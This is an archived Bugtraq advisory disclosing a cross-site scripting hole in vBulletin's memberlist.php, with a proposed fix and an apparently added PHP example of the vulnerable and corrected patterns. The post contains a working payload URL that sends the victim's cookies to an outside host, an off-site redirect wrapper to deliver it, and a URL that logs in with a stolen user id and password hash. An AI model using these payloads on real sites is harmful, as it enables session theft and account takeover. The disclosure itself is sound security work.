Bugtraq mailing list archives

memberlist.php of vBulletin


From: <plato () swgmotu com>
Date: Thu, 21 Mar 2002 19:26:36 -0500

vBulletin ALL versions
Vendor status: notified 3/18/2;  no response
 
Within the first few lines of code in memberlist.php, the variable
$letterbits is evaled.  Because of the way PHP initializes variables, we can
inject HTML or JavaScript into the document.  So by directing a user to,
for example:
http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E
(vbulletin.com has apparently patched their installation somehow), I can
steal the user's password hash and user id.  Because of the way vB parses
URLs, the above will not function inside the forum, but if we put this in an
off-site HTML file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E";
</script>
and then link to it instead, the exploit will work as intended...the user
doesn't even have to be aware of what has transpired...the above link will
proceed first to the memberlist w/ cookie-stealing code, and then to my
<shameless plug>Star Wars Galaxies Player Association's homepage,
http://www.swgmotu.com</shameless plug>
 
With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[user id]&bbpassword=[password hash]
 
I have tried this successfully on five other users besides myself (all with
consent).
 
I believe the simplest fix would be to initialize $letterbits ($letterbits =
"";) at the top of memberlist.php.
 
~Plato
 
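The pattern the post describes and the fix it proposes, as an added PHP illustration; this is not vBulletin's code, and the function names, the array standing in for register_globals and the sample input are all constructed for the example.

```php
<?php
// Added illustration, not vBulletin's code. Models the bug described in the
// post: with register_globals on, a request parameter becomes a PHP variable,
// so a variable that is appended to but never initialised can be seeded from
// ?letterbits=... and that value then flows into the page unescaped.

// Vulnerable pattern. $request stands in for register_globals importing the
// query string into the local scope (constructed simulation).
function build_letterbits_vulnerable(array $letters, array $request): string
{
    if (isset($request['letterbits'])) {
        $letterbits = $request['letterbits']; // attacker-controlled seed
    }
    // No "$letterbits = '';" here, so the loop appends to whatever was seeded.
    foreach ($letters as $l) {
        $letterbits .= '<a href="memberlist.php?what=' . $l . '">' . $l . '</a> ';
    }
    return $letterbits ?? '';
}

// Hardened pattern: initialise first (the fix proposed in the post) and escape
// anything that reaches HTML or a URL. Setting register_globals = Off in
// php.ini removes the injection route altogether.
function build_letterbits_fixed(array $letters): string
{
    $letterbits = '';
    foreach ($letters as $l) {
        $text = htmlspecialchars($l, ENT_QUOTES, 'UTF-8');
        $href = 'memberlist.php?what=' . urlencode($l);
        $letterbits .= '<a href="' . $href . '">' . $text . '</a> ';
    }
    return $letterbits;
}

// Constructed sample input: a harmless marker in place of a real payload.
$letters = ['A', 'B', 'C'];
$request = ['letterbits' => '<script>alert(1)</script>'];

$vuln  = build_letterbits_vulnerable($letters, $request);
$fixed = build_letterbits_fixed($letters);

// Regression-style check: markup supplied in the request survives into the
// output only in the vulnerable version.
var_dump(strpos($vuln, '<script>') !== false);
var_dump(strpos($fixed, '<script>') !== false);
```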
